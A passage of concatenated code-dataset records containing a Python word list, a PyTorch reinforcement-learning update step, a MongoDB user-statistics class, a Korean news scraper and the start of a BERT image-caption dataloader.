,\n\t\t\t'lavisher',\n\t\t\t'layering',\n\t\t\t'laywomen',\n\t\t\t'leaching',\n\t\t\t'leashing',\n\t\t\t'leftward',\n\t\t\t'legation',\n\t\t\t'lethargy',\n\t\t\t'licensor',\n\t\t\t'lifeboat',\n\t\t\t'ligament',\n\t\t\t'ligature',\n\t\t\t'liquored',\n\t\t\t'literacy',\n\t\t\t'loamiest',\n\t\t\t'loathing',\n\t\t\t'locating',\n\t\t\t'locative',\n\t\t\t'lockstep',\n\t\t\t'lodestar',\n\t\t\t'lodgment',\n\t\t\t'longwise',\n\t\t\t'lordship',\n\t\t\t'lovebird',\n\t\t\t'lovesick',\n\t\t\t'lowering',\n\t\t\t'luckiest',\n\t\t\t'lukewarm',\n\t\t\t'luminary',\n\t\t\t'lumpfish',\n\t\t\t'lumpiest',\n\t\t\t'lunkhead',\n\t\t\t'lurching',\n\t\t\t'lymphoid',\n\t\t\t'machined',\n\t\t\t'madhouse',\n\t\t\t'magister',\n\t\t\t'magnetic',\n\t\t\t'maidenly',\n\t\t\t'majoring',\n\t\t\t'majority',\n\t\t\t'maledict',\n\t\t\t'maligned',\n\t\t\t'maligner',\n\t\t\t'malinger',\n\t\t\t'mandible',\n\t\t\t'mangiest',\n\t\t\t'mangrove',\n\t\t\t'manicure',\n\t\t\t'manifest',\n\t\t\t'manifold',\n\t\t\t'manliest',\n\t\t\t'manpower',\n\t\t\t'marbling',\n\t\t\t'marching',\n\t\t\t'marigold',\n\t\t\t'marquise',\n\t\t\t'masterly',\n\t\t\t'matchbox',\n\t\t\t'matronly',\n\t\t\t'maturely',\n\t\t\t'maturing',\n\t\t\t'maverick',\n\t\t\t'medaling',\n\t\t\t'medalist',\n\t\t\t'mediator',\n\t\t\t'megavolt',\n\t\t\t'meltdown',\n\t\t\t'mensural',\n\t\t\t'merciful',\n\t\t\t'metaling',\n\t\t\t'metaphor',\n\t\t\t'methadon',\n\t\t\t'methanol',\n\t\t\t'metrical',\n\t\t\t'milkwort',\n\t\t\t'minstrel',\n\t\t\t'minutely',\n\t\t\t'mirthful',\n\t\t\t'misbegot',\n\t\t\t'misdealt',\n\t\t\t'misheard',\n\t\t\t'misjudge',\n\t\t\t'misplace',\n\t\t\t'misquote',\n\t\t\t'misruled',\n\t\t\t'mistaken',\n\t\t\t'modality',\n\t\t\t'modeling',\n\t\t\t'modernly',\n\t\t\t'modestly',\n\t\t\t'modishly',\n\t\t\t'modulate',\n\t\t\t'moisture',\n\t\t\t'molarity',\n\t\t\t'moleskin',\n\t\t\t'monarchy',\n\t\t\t'monastic',\n\t\t\t'monetary',\n\t\t\t'monkfish',\n\t\t\t'monsieur',\n\t\t\t'monstera',\n\t\t\t'moralist',\n\t\t\t'morality',\n\t\t\t'moralize',\n\t\t\t'morbidly',\n\t\t\t'mordancy',\n\t\t\t'morphine',\n\t\t\t'morticed',\n\t\t\t'mortised',\n\t\t\t'moseying',\n\t\t\t'motherly',\n\t\t\t'mouthier',\n\t\t\t'mouthing',\n\t\t\t'moveably',\n\t\t\t'movingly',\n\t\t\t'mucilage',\n\t\t\t'muckiest',\n\t\t\t'mulching',\n\t\t\t'mulcting',\n\t\t\t'murkiest',\n\t\t\t'muscadel',\n\t\t\t'muscatel',\n\t\t\t'muscling',\n\t\t\t'musicale',\n\t\t\t'musingly',\n\t\t\t'mustache',\n\t\t\t'mutchkin',\n\t\t\t'myriapod',\n\t\t\t'mystique',\n\t\t\t'mythical',\n\t\t\t'narghile',\n\t\t\t'natively',\n\t\t\t'naturism',\n\t\t\t'necropsy',\n\t\t\t'neighbor',\n\t\t\t'neoplasm',\n\t\t\t'nepotism',\n\t\t\t'neurotic',\n\t\t\t'nightcap',\n\t\t\t'nightjar',\n\t\t\t'nimblest',\n\t\t\t'nobelium',\n\t\t\t'normalcy',\n\t\t\t'notarize',\n\t\t\t'novelist',\n\t\t\t'nugatory',\n\t\t\t'numeracy',\n\t\t\t'obduracy',\n\t\t\t'obdurate',\n\t\t\t'obeisant',\n\t\t\t'obituary',\n\t\t\t'obligate',\n\t\t\t'obscured',\n\t\t\t'obstacle',\n\t\t\t'obtained',\n\t\t\t'obtusely',\n\t\t\t'obviated',\n\t\t\t'ochering',\n\t\t\t'olibanum',\n\t\t\t'oligarch',\n\t\t\t'olympiad',\n\t\t\t'opaquely',\n\t\t\t'opaquing',\n\t\t\t'operatic',\n\t\t\t'ordinate',\n\t\t\t'organdie',\n\t\t\t'organism',\n\t\t\t'organist',\n\t\t\t'organize',\n\t\t\t'orgasmic',\n\t\t\t'orgastic',\n\t\t\t'oriental',\n\t\t\t'origanum',\n\t\t\t'ornately',\n\t\t\t'orphaned',\n\t\t\t'osculate',\n\t\t\t'outbrave',\n\t\t\t'outbreak',\n\t\t\t'outcried',\n\t\t\t'outdrive',\n\t\t\t'outfaced',\n\t\t\t'outfield',\n\t\t\t'outflank',\n\t\t\t'outlawed',\n\t\t\t'outlawry',\n\t\t\t'outlined',\n\t\t\t'outlived',\n\t\t\t'outlying',\n\t\t\t'outmarch',\n\t\t\t'outpaced',\n\t\t\t'outraced',\n\t\t\t'outraged',\n\t\t\t'outreach',\n\t\t\t'outrival',\n\t\t\t'outshine',\n\t\t\t'outsider',\n\t\t\t'outsized',\n\t\t\t'outspeak',\n\t\t\t'outspend',\n\t\t\t'outvying',\n\t\t\t'outweigh',\n\t\t\t'overbusy',\n\t\t\t'overcast',\n\t\t\t'overhand',\n\t\t\t'overhang',\n\t\t\t'overhaul',\n\t\t\t'overhung',\n\t\t\t'overlaid',\n\t\t\t'overlain',\n\t\t\t'overland',\n\t\t\t'overmuch',\n\t\t\t'overpaid',\n\t\t\t'overplay',\n\t\t\t'overstay',\n\t\t\t'ovulated',\n\t\t\t'palimony',\n\t\t\t'palmiest',\n\t\t\t'palsying',\n\t\t\t'panicked',\n\t\t\t'panicled',\n\t\t\t'parching',\n\t\t\t'parhelic',\n\t\t\t'parodist',\n\t\t\t'paroling',\n\t\t\t'paroquet',\n\t\t\t'paroxysm',\n\t\t\t'partible',\n\t\t\t'particle',\n\t\t\t'partying',\n\t\t\t'pastiche',\n\t\t\t'pastured',\n\t\t\t'patchier',\n\t\t\t'patchily',\n\t\t\t'patching',\n\t\t\t'pathogen',\n\t\t\t'peaching',\n\t\t\t'pearling',\n\t\t\t'pectoral',\n\t\t\t'peculiar',\n\t\t\t'pedaling',\n\t\t\t'pedantic',\n\t\t\t'pedantry',\n\t\t\t'pegboard',\n\t\t\t'penlight',\n\t\t\t'penumbra',\n\t\t\t'perching',\n\t\t\t'perianth',\n\t\t\t'personal',\n\t\t\t'perusing',\n\t\t\t'pestling',\n\t\t\t'petaloid',\n\t\t\t'phenolic',\n\t\t\t'phenylic',\n\t\t\t'phonemic',\n\t\t\t'phonetic',\n\t\t\t'phoniest',\n\t\t\t'phrasing',\n\t\t\t'physical',\n\t\t\t'physique',\n\t\t\t'picayune',\n\t\t\t'pictured',\n\t\t\t'pilaster',\n\t\t\t'pilchard',\n\t\t\t'pilewort',\n\t\t\t'pilotage',\n\t\t\t'pinafore',\n\t\t\t'pinochle',\n\t\t\t'piquancy',\n\t\t\t'pitchmen',\n\t\t\t'plainest',\n\t\t\t'planchet',\n\t\t\t'plashing',\n\t\t\t'plastery',\n\t\t\t'platform',\n\t\t\t'platinum',\n\t\t\t'platonic',\n\t\t\t'playsuit',\n\t\t\t'playtime',\n\t\t\t'pleading',\n\t\t\t'pleasing',\n\t\t\t'pleating',\n\t\t\t'plectron',\n\t\t\t'plectrum',\n\t\t\t'pleonasm',\n\t\t\t'pleurisy',\n\t\t\t'ploughed',\n\t\t\t'pluckier',\n\t\t\t'plucking',\n\t\t\t'plumaged',\n\t\t\t'plumbery',\n\t\t\t'plumbing',\n\t\t\t'plushier',\n\t\t\t'plutonic',\n\t\t\t'poaching',\n\t\t\t'podgiest',\n\t\t\t'podiatry',\n\t\t\t'poetical',\n\t\t\t'polarity',\n\t\t\t'polarize',\n\t\t\t'polished',\n\t\t\t'polisher',\n\t\t\t'polymath',\n\t\t\t'pomading',\n\t\t\t'pomander',\n\t\t\t'ponytail',\n\t\t\t'porkiest',\n\t\t\t'portable',\n\t\t\t'postcard',\n\t\t\t'postiche',\n\t\t\t'postlude',\n\t\t\t'postmark',\n\t\t\t'postured',\n\t\t\t'potsherd',\n\t\t\t'pouching',\n\t\t\t'poultice',\n\t\t\t'poundage',\n\t\t\t'powerful',\n\t\t\t'powering',\n\t\t\t'prankish',\n\t\t\t'pratique',\n\t\t\t'prickled',\n\t\t\t'prideful',\n\t\t\t'priestly',\n\t\t\t'primeval',\n\t\t\t'princely',\n\t\t\t'probated',\n\t\t\t'procaine',\n\t\t\t'proclaim',\n\t\t\t'prodigal',\n\t\t\t'profaned',\n\t\t\t'profiled',\n\t\t\t'profited',\n\t\t\t'promised',\n\t\t\t'prostyle',\n\t\t\t'proudest',\n\t\t\t'provable',\n\t\t\t'provably',\n\t\t\t'province',\n\t\t\t'proximal',\n\t\t\t'psalmody',\n\t\t\t'psyching',\n\t\t\t'ptyalism',\n\t\t\t'pubertal',\n\t\t\t'publican',\n\t\t\t'pudgiest',\n\t\t\t'pulmonic',\n\t\t\t'pulsated',\n\t\t\t'punchier',\n\t\t\t'punished',\n\t\t\t'punitory',\n\t\t\t'purblind',\n\t\t\t'purchase',\n\t\t\t'purslane',\n\t\t\t'putridly',\n\t\t\t'quackery',\n\t\t\t'quacking',\n\t\t\t'quagmire',\n\t\t\t'quainter',\n\t\t\t'quaintly',\n\t\t\t'quakiest',\n\t\t\t'qualmish',\n\t\t\t'quantify',\n\t\t\t'quashing',\n\t\t\t'queasily',\n\t\t\t'querying',\n\t\t\t'questing',\n\t\t\t'question',\n\t\t\t'quickest',\n\t\t\t'quipster',\n\t\t\t'quotable',\n\t\t\t'quotably',\n\t\t\t'raftsmen',\n\t\t\t'ragouted',\n\t\t\t'rakishly',\n\t\t\t'rambling',\n\t\t\t'randiest',\n\t\t\t'randomly',\n\t\t\t'rangiest',\n\t\t\t'ransomed',\n\t\t\t'rationed',\n\t\t\t'ravingly',\n\t\t\t'ravished',\n\t\t\t'rawboned',\n\t\t\t'reaching',\n\t\t\t'reacting',\n\t\t\t'reaction',\n\t\t\t'readjust',\n\t\t\t'readying',\n\t\t\t'rebating',\n\t\t\t'rebuking',\n\t\t\t'recoding',\n\t\t\t'recusant',\n\t\t\t'redshank',\n\t\t\t'reducing',\n\t\t\t'refacing',\n\t\t\t'refusing',\n\t\t\t'refuting',\n\t\t\t'regional',\n\t\t\t'relating',\n\t\t\t'relation',\n\t\t\t'relaunch',\n\t\t\t'relaxing',\n\t\t\t'relaying',\n\t\t\t'remaking',\n\t\t\t'removing',\n\t\t\t'repaying',\n\t\t\t'replying',\n\t\t\t'reposing',\n\t\t\t'republic',\n\t\t\t'reputing',\n\t\t\t'requital',\n\t\t\t'rescuing',\n\t\t\t'residual',\n\t\t\t'resoling',\n\t\t\t'resubmit',\n\t\t\t'resuming',\n\t\t\t'retaking',\n\t\t\t'retching',\n\t\t\t'revoking',\n\t\t\t'rhapsody',\n\t\t\t'rhyolite',\n\t\t\t'rickshaw',\n\t\t\t'rifleman',\n\t\t\t'rightful',\n\t\t\t'riposted',\n\t\t\t'roaching',\n\t\t\t'roasting',\n\t\t\t'robustly',\n\t\t\t'rockfish',\n\t\t\t'rockiest',\n\t\t\t'romanced',\n\t\t\t'romantic',\n\t\t\t'rondeaux',\n\t\t\t'rotundly',\n\t\t\t'roughest',\n\t\t\t'roundest',\n\t\t\t'roundish',\n\t\t\t'rousting',\n\t\t\t'rowdiest',\n\t\t\t'rowdyism',\n\t\t\t'royalism',\n\t\t\t'royalist',\n\t\t\t'rudiment',\n\t\t\t'rumbling',\n\t\t\t'ruminate',\n\t\t\t'rumpling',\n\t\t\t'rustical',\n\t\t\t'rustling',\n\t\t\t'sabering',\n\t\t\t'saboteur',\n\t\t\t'sacredly',\n\t\t\t'saintdom',\n\t\t\t'saliency',\n\t\t\t'salmonid',\n\t\t\t'saluting',\n\t\t\t'sampling',\n\t\t\t'sanctify',\n\t\t\t'sandwich',\n\t\t\t'sandwort',\n\t\t\t'saponify',\n\t\t\t'sardonic',\n\t\t\t'sardonyx',\n\t\t\t'sauteing',\n\t\t\t'savoring',\n\t\t\t'scalding',\n\t\t\t'scalping',\n\t\t\t'scamping',\n\t\t\t'scandium',\n\t\t\t'scantier',\n\t\t\t'scantily',\n\t\t\t'scarfing',\n\t\t\t'scathing',\n\t\t\t'scenario',\n\t\t\t'scheming',\n\t\t\t'schmaltz',\n\t\t\t'scolding',\n\t\t\t'scornful',\n\t\t\t'scourged',\n\t\t\t'scouring',\n\t\t\t'scouting',\n\t\t\t'scowling',\n\t\t\t'scramble',\n\t\t\t'scraping',\n\t\t\t'scrawled',\n\t\t\t'screwing',\n\t\t\t'scrimped',\n\t\t\t'scripted',\n\t\t\t'scrofula',\n\t\t\t'scrounge',\n\t\t\t'scrupled',\n\t\t\t'scrutiny',\n\t\t\t'sculpted',\n\t\t\t'sculptor',\n\t\t\t'scurvily',\n\t\t\t'scything',\n\t\t\t'seafront',\n\t\t\t'seamount',\n\t\t\t'secantly',\n\t\t\t'secondly',\n\t\t\t'sectoral',\n\t\t\t'securing',\n\t\t\t'security',\n\t\t\t'sedating',\n\t\t\t'sedation',\n\t\t\t'seducing',\n\t\t\t'sedulity',\n\t\t\t'seignory',\n\t\t\t'semantic',\n\t\t\t'seminary',\n\t\t\t'semolina',\n\t\t\t'seraglio',\n\t\t\t'seraphic',\n\t\t\t'seraphim',\n\t\t\t'shackled',\n\t\t\t'shadblow',\n\t\t\t'shadower',\n\t\t\t'shafting',\n\t\t\t'shambled',\n\t\t\t'shameful',\n\t\t\t'shamrock',\n\t\t\t'sharking',\n\t\t\t'sharping',\n\t\t\t'shearing',\n\t\t\t'sheaving',\n\t\t\t'sheikdom',\n\t\t\t'shelduck',\n\t\t\t'shelving',\n\t\t\t'sherlock',\n\t\t\t'shingled',\n\t\t\t'shipload',\n\t\t\t'shipmate',\n\t\t\t'shipment',\n\t\t\t'shipworm',\n\t\t\t'shipyard',\n\t\t\t'shocking',\n\t\t\t'shortage',\n\t\t\t'shorting',\n\t\t\t'shoulder',\n\t\t\t'shouting',\n\t\t\t'showgirl',\n\t\t\t'shrapnel',\n\t\t\t'shrewdly',\n\t\t\t'shrimped',\n\t\t\t'shucking',\n\t\t\t'shutdown',\n\t\t\t'sidelong',\n\t\t\t'sidewalk',\n\t\t\t'signaled',\n\t\t\t'signaler',\n\t\t\t'silkworm',\n\t\t\t'simulate',\n\t\t\t'singable',\n\t\t\t'singular',\n\t\t\t'sinkhole',\n\t\t\t'siphoned',\n\t\t\t'skewbald',\n\t\t\t'skinhead',\n\t\t\t'skydiver',\n\t\t\t'skylight',\n\t\t\t'slacking',\n\t\t\t'slangier',\n\t\t\t'slighted',\n\t\t\t'slighter',\n\t\t\t'slipknot',\n\t\t\t'slithery',\n\t\t\t'slouched',\n\t\t\t'sloughed',\n\t\t\t'sludgier',\n\t\t\t'slumbery',\n\t\t\t'slumping',\n\t\t\t'slurping',\n\t\t\t'smacking',\n\t\t\t'smarting',\n\t\t\t'smearing',\n\t\t\t'smelting',\n\t\t\t'smidgeon',\n\t\t\t'smirched',\n\t\t\t'smocking',\n\t\t\t'smoulder',\n\t\t\t'smudgier',\n\t\t\t'smudgily',\n\t\t\t'snatched',\n\t\t\t'snatcher',\n\t\t\t'sneakily',\n\t\t\t'snowbird',\n\t\t\t'sobering',\n\t\t\t'sobriety',\n\t\t\t'sociable',\n\t\t\t'sociably',\n\t\t\t'societal',\n\t\t\t'sodality',\n\t\t\t'softback',\n\t\t\t'software',\n\t\t\t'solacing',\n\t\t\t'solarium',\n\t\t\t'soldiery',\n\t\t\t'solitary',\n\t\t\t'solitude',\n\t\t\t'solvated',\n\t\t\t'solvency',\n\t\t\t'sombrely',\n\t\t\t'somewhat',\n\t\t\t'songbird',\n\t\t\t'songlike',\n\t\t\t'sourcing',\n\t\t\t'southern',\n\t\t\t'southpaw',\n\t\t\t'souvenir',\n\t\t\t'souvlaki',\n\t\t\t'sowbread',\n\t\t\t'spadeful',\n\t\t\t'spangled',\n\t\t\t'sparking',\n\t\t\t'sparkled',\n\t\t\t'spavined',\n\t\t\t'speaking',\n\t\t\t'spearing',\n\t\t\t'specking',\n\t\t\t'spectral',\n\t\t\t'spectrum',\n\t\t\t'specular',\n\t\t\t'sphagnum',\n\t\t\t'sphenoid',\n\t\t\t'sphering',\n\t\t\t'spheroid',\n\t\t\t'spicular',\n\t\t\t'spiracle',\n\t\t\t'spiteful',\n\t\t\t'splaying',\n\t\t\t'splendor',\n\t\t\t'splinted',\n\t\t\t'splinter',\n\t\t\t'splotchy',\n\t\t\t'splurged',\n\t\t\t'spoilage',\n\t\t\t'spondaic',\n\t\t\t'spongier',\n\t\t\t'spongily',\n\t\t\t'sporadic',\n\t\t\t'sportily',\n\t\t\t'sporting',\n\t\t\t'sportive',\n\t\t\t'spouting',\n\t\t\t'sprained',\n\t\t\t'sprawled',\n\t\t\t'spraying',\n\t\t\t'sprinkle',\n\t\t\t'sprinted',\n\t\t\t'sprocket',\n\t\t\t'sprouted',\n\t\t\t'sprucely',\n\t\t\t'sprucing',\n\t\t\t'spunkier',\n\t\t\t'spurting',\n\t\t\t'squadron',\n\t\t\t'squander',\n\t\t\t'squarely',\n\t\t\t'squaring',\n\t\t\t'squawked',\n\t\t\t'squawker',\n\t\t\t'squinted',\n\t\t\t'squinter',\n\t\t\t'squirmed',\n\t\t\t'squirted',\n\t\t\t'stabling',\n\t\t\t'stacking',\n\t\t\t'stalking',\n\t\t\t'stamping',\n\t\t\t'stanched',\n\t\t\t'stanchly',\n\t\t\t'stapling',\n\t\t\t'starched',\n\t\t\t'starlike',\n\t\t\t'starling',\n\t\t\t'starving',\n\t\t\t'steadily',\n\t\t\t'steading',\n\t\t\t'stealing',\n\t\t\t'steamily',\n\t\t\t'steaming',\n\t\t\t'sterling',\n\t\t\t'stickler',\n\t\t\t'stockade',\n\t\t\t'stockier',\n\t\t\t'stockily',\n\t\t\t'stocking',\n\t\t\t'stockman',\n\t\t\t'stockmen',\n\t\t\t'stodgier',\n\t\t\t'stodgily',\n\t\t\t'stomping',\n\t\t\t'stonefly',\n\t\t\t'storable',\n\t\t\t'stormily',\n\t\t\t'storming',\n\t\t\t'strafing',\n\t\t\t'strained',\n\t\t\t'strangle',\n\t\t\t'strawing',\n\t\t\t'straying',\n\t\t\t'strewing',\n\t\t\t'stricken',\n\t\t\t'strickle',\n\t\t\t'stringed',\n\t\t\t'strobila',\n\t\t\t'strobile',\n\t\t\t'stroking',\n\t\t\t'strongly',\n\t\t\t'strophic',\n\t\t\t'studying',\n\t\t\t'stumbled',\n\t\t\t'stumbler',\n\t\t\t'stumpier',\n\t\t\t'stumping',\n\t\t\t'stupider',\n\t\t\t'stupidly',\n\t\t\t'sturdily',\n\t\t\t'sturgeon',\n\t\t\t'stylized',\n\t\t\t'subagent',\n\t\t\t'sublimed',\n\t\t\t'suborned',\n\t\t\t'subpoena',\n\t\t\t'subpolar',\n\t\t\t'subtonic',\n\t\t\t'subtopia',\n\t\t\t'suchlike',\n\t\t\t'suckling',\n\t\t\t'suitable',\n\t\t\t'suitably',\n\t\t\t'sulfated',\n\t\t\t'sulphate',\n\t\t\t'sulphide',\n\t\t\t'sunbaked',\n\t\t\t'sunbathe',\n\t\t\t'sunlight',\n\t\t\t'superbly',\n\t\t\t'superman',\n\t\t\t'supernal',\n\t\t\t'supertax',\n\t\t\t'supinate',\n\t\t\t'supinely',\n\t\t\t'surfaced',\n\t\t\t'surgical',\n\t\t\t'suricate',\n\t\t\t'surnamed',\n\t\t\t'surplice',\n\t\t\t'suzerain',\n\t\t\t'swampier',\n\t\t\t'swamping',\n\t\t\t'swankier',\n\t\t\t'swanlike',\n\t\t\t'swarming',\n\t\t\t'swathing',\n\t\t\t'swearing',\n\t\t\t'sweating',\n\t\t\t'swerving',\n\t\t\t'swindler',\n\t\t\t'swingled',\n\t\t\t'switched',\n\t\t\t'sybarite',\n\t\t\t'sycamore',\n\t\t\t'syconium',\n\t\t\t'symbolic',\n\t\t\t'synaptic',\n\t\t\t'syndetic',\n\t\t\t'syndrome',\n\t\t\t'synoptic',\n\t\t\t'syphoned',\n\t\t\t'syringed',\n\t\t\t'tailored',\n\t\t\t'thankful',\n\t\t\t'thousand',\n\t\t\t'tribunal',\n\t\t\t'underway',\n\t\t\t'velocity',\n\t\t\t'vineyard',\n\t\t\t'visceral',\n\t\t\t'vocalist',\n\t\t\t'weaponry',\n\t\t\t'yourself']\n\t\t\t","sub_path":"wordlist.py","file_name":"wordlist.py","file_ext":"py","file_size_in_byte":14662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"439371243","text":"import torch\nimport numpy as np\n\ndef flat(grads):\n flat_grads = []\n for grad in grads:\n flat_grads.append(grad.view(-1))\n flat_grads = torch.cat(flat_grads)\n return flat_grads\n\n\ndef get_flat_params_from(model):\n params = []\n for param in model.parameters():\n params.append(param.data.view(-1))\n\n flat_params = torch.cat(params)\n return flat_params\n\n\ndef set_flat_params_to(model, flat_params):\n prev_ind = 0\n for param in model.parameters():\n flat_size = int(np.prod(list(param.size())))\n param.data.copy_(\n flat_params[prev_ind:prev_ind + flat_size].view(param.size()))\n prev_ind += flat_size\n\n\ndef get_update_direction_with_lo(grad_flat, current_net, lo):\n directions = []\n prev_ind = 0\n for param in current_net.parameters():\n flat_size = int(np.prod(list(param.size())))\n ndarray = grad_flat[prev_ind:prev_ind + flat_size].view(param.size()).detach()\n if ndarray.dim() > 1: # inter-layer parameters\n ndarray = ndarray.numpy()\n direction_layer = lo.lo_oracle(-ndarray)\n direction_layer = torch.from_numpy(direction_layer).view(-1)\n direction_layer = param.view(-1) - direction_layer.double()\n else: # parameters of activation functions\n direction_layer = -ndarray\n directions.append(direction_layer)\n prev_ind += flat_size\n direction = torch.cat(directions)\n # print(torch.norm(-grad_flat - direction))\n return direction\n\n\ndef a2c_scg_fw_step(policy_net, value_net, optimizer_policy, optimizer_value, states, actions, returns, advantages, l2_reg, prev_grad, d_theta, i_iter, lo):\n\n \"\"\"update critic\"\"\"\n values_pred = value_net(states)\n value_loss = (values_pred - returns).pow(2).mean()\n # weight decay\n for param in value_net.parameters():\n value_loss += param.pow(2).sum() * l2_reg\n optimizer_value.zero_grad()\n value_loss.backward()\n optimizer_value.step()\n\n \"\"\"update policy\"\"\"\n learning_rate = 3e-2\n alpha = 1/(i_iter+2)**(2/3)\n # alpha = 1\n log_probs = policy_net.get_log_prob(states, actions)\n probs = torch.exp(log_probs)\n dice = probs/probs.detach()\n policy_loss = -(dice * advantages).mean()\n grad = torch.autograd.grad(policy_loss, policy_net.parameters(), retain_graph=True, create_graph=True)\n # torch.nn.utils.clip_grad_norm_(policy_net.parameters(), 40)\n grad_flat_current = flat(grad)\n\n grad_flat = (1-alpha) * prev_grad + alpha * grad_flat_current\n # direction = grad_flat/torch.norm(grad_flat)\n direction = get_update_direction_with_lo(grad_flat, policy_net, lo)\n # direction = grad_flat\n prev_params = get_flat_params_from(policy_net)\n updated_params = prev_params - learning_rate * direction\n set_flat_params_to(policy_net, updated_params)\n d_theta = updated_params - prev_params\n\n return grad_flat.detach(), d_theta.detach()\n\n","sub_path":"core/a2c_scg_fw.py","file_name":"a2c_scg_fw.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"161038937","text":"from pymongo import MongoClient\nimport datetime\nimport pandas as pd\nimport json\n\nclass DataBase:\n def __init__(self):\n with open('tokens.json') as json_file:\n data = json.load(json_file)\n self.client = MongoClient(data[\"database\"])\n self.users = self.client.heroku_2d7ckb75.users\n self.logs = self.client.heroku_2d7ckb75.logs\n self.stats = self.client.heroku_2d7ckb75.server_stats\n\n def update_messages(self, user, msgs=1):\n try:\n id = self.get_usr(self.users, user)[\"_id\"]\n except:\n id = None\n old, date = self.get_msgs(user)\n if id is not None:\n self.users.find_one_and_update({\"_id\":id}, {\"$set\":{\"messages\": old + msgs}})\n else:\n self.create_new_messages(user, 1)\n\n def get_msgs(self, usr):\n try:\n u = self.get_usr(self.users, usr)\n return u[\"messages\"], u[\"joined\"]\n except:\n return 0, self.get_date()\n\n def create_new_messages(self, user, msgs=0):\n usr = {\"user\": str(user), \"messages\": msgs, \"joined\":DataBase.get_date()}\n id = self.users.insert_one(usr).inserted_id\n return id\n\n def get_usr(self, db, user):\n found = db.find_one({\"user\":str(user)})\n return found\n\n def update_server_stats(self,usr=0):\n try:\n if usr == 1:\n old = self.stats.find_one({\"date\": DataBase.get_date()})[\"newUsers\"]\n self.stats.find_one_and_update({\"date\": DataBase.get_date()}, {\"$set\": {\"newUsers\": old + 1}})\n else:\n old = self.stats.find_one({\"date\":DataBase.get_date()})[\"messages\"]\n self.stats.find_one_and_update({\"date\": DataBase.get_date()}, {\"$set\": {\"messages\": old + 1}})\n except:\n stat = {\"date\": DataBase.get_date(), \"messages\": 1, \"newUsers\": 0}\n id = self.stats.insert_one(stat).inserted_id\n\n def get_top_users(self):\n query = self.users.find({})\n top = 0\n users = []\n for doc in query:\n if doc[\"messages\"] > top:\n top = doc[\"messages\"]\n users = [doc[\"user\"]]\n elif doc[\"messages\"] == top:\n users.append(doc[\"user\"])\n\n return users, top\n\n def get_all_messages(self):\n query = self.stats.find({})\n sum = 0\n l = 0\n for doc in query:\n l += 1\n sum += doc[\"messages\"]\n\n return sum, l\n\n def scoreboard(self):\n query = self.users.find({})\n usrs = []\n for doc in query:\n msg = int(doc[\"messages\"])\n usrs.append([doc[\"user\"], msg])\n usrs.sort(key=lambda x: x[1])\n usrs = usrs[-5:]\n\n df = pd.DataFrame(usrs, columns=[\"user\", \"messages\"])\n d = df[[\"user\", \"messages\"]]\n d = d.sort_values(by=['messages'], ascending=False)\n return str(d.head().to_string(index=False))\n\n @staticmethod\n def get_date():\n return str(datetime.datetime.now()).split(\" \")[0]\n\n def add_rep(self, user):\n try:\n id = self.get_usr(self.users, user)[\"_id\"]\n except:\n id = None\n old, date = self.get_rep(user)\n if id is not None:\n self.users.update_one({\"_id\":id}, {\"$set\":{\"reps\": old + 1}})\n self.users.update_one({\"_id\": id}, {\"$set\": {\"last_rep\": self.get_date()}})\n\n def get_rep(self, usr):\n try:\n u = self.get_usr(self.users, str(usr))\n return u[\"reps\"], u[\"last_rep\"]\n except Exception as e:\n print(e)\n return 0\n\n def rep_scoreboard(self):\n query = self.users.find({})\n usrs = []\n for doc in query:\n try:\n rep = int(doc[\"reps\"])\n usrs.append([doc[\"user\"], rep])\n except:\n pass\n usrs.sort(key=lambda x: x[1])\n usrs = usrs[-5:]\n\n df = pd.DataFrame(usrs, columns=[\"user\", \"reps\"])\n d = df[[\"user\", \"reps\"]]\n d = d.sort_values(by=['reps'], ascending=False)\n return str(d.head().to_string(index=False))\n","sub_path":"cogs/utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192108259","text":"from scrapy.selector import Selector\nfrom app.ext.utils.Performance import Performance\nfrom app.crawler.utils.kr.news import CoronaNewsCrawler\nfrom app.crawler.utils.ext import cleanText, NewsNogadaJsonData\n\n\nclass KrNewsParser:\n def __init__(self):\n self.loop = Performance()\n self.data = CoronaNewsCrawler()\n\n async def query(self):\n soup = await self.data.Request()\n a = await self.loop.run_in_threadpool(lambda: Selector(text=soup))\n description = await self.loop.run_in_threadpool(\n lambda: a.css(\"#main_pack > div.news.mynews.section._prs_nws > ul > li > dl\"))\n __press = await self.loop.run_in_threadpool(lambda: description.css(\"dt > a\"))\n __title = await self.loop.run_in_threadpool(lambda: description.css(\"dd > span._sp_each_source\"))\n __summary = await self.loop.run_in_threadpool(lambda: description.css(\"dd:nth-child(3)\"))\n __link = await self.loop.run_in_threadpool(lambda: description.css('dt > a'))\n _link = await self.loop.run_in_threadpool(lambda: __link.xpath(\"@href\"))\n _press = await self.loop.run_in_threadpool(lambda: __press.getall())\n _title = await self.loop.run_in_threadpool(lambda: __title.getall())\n _summary = await self.loop.run_in_threadpool(lambda: __summary.getall())\n link = await self.loop.run_in_threadpool(lambda: _link.getall())\n press = []\n for i in _press:\n ___press = await cleanText(i)\n press.append(___press)\n title = []\n for i in _title:\n ___title = await cleanText(i)\n title.append(___title.replace(\"선정\", \"\").replace(\"언론사\", \"\"))\n summary = []\n for i in _summary:\n ___summary = await cleanText(i)\n summary.append(___summary)\n jsondata = await NewsNogadaJsonData(a=title, b=press, c=summary, d=link)\n return jsondata\n","sub_path":"app/crawler/kr/krnews.py","file_name":"krnews.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"385536707","text":"import numpy as np\nimport torch\nfrom torch.utils.data import DataLoader, Dataset, TensorDataset\nfrom torch.utils import data\nfrom torchvision import transforms, datasets, models\nfrom PIL import Image\n\n\n'''\nLoad the BERT tokenizer.\n'''\nfrom transformers import BertTokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\n\n\n\n\n'''\nDataloader for Training/Validation\nReturns (Image, Caption, Input_id, Attention_mask, label)\n'''\nclass mydataset(): \n\n def __init__(self, classification_list, name):\n\n super(mydataset).__init__()\n \n self.X = []\n self.Cap = []\n self.Y = []\n \n with open(classification_list, mode = 'r') as f:\n \n for line in f:\n path, caption, label = line[:-1].split('\\t')\n\n 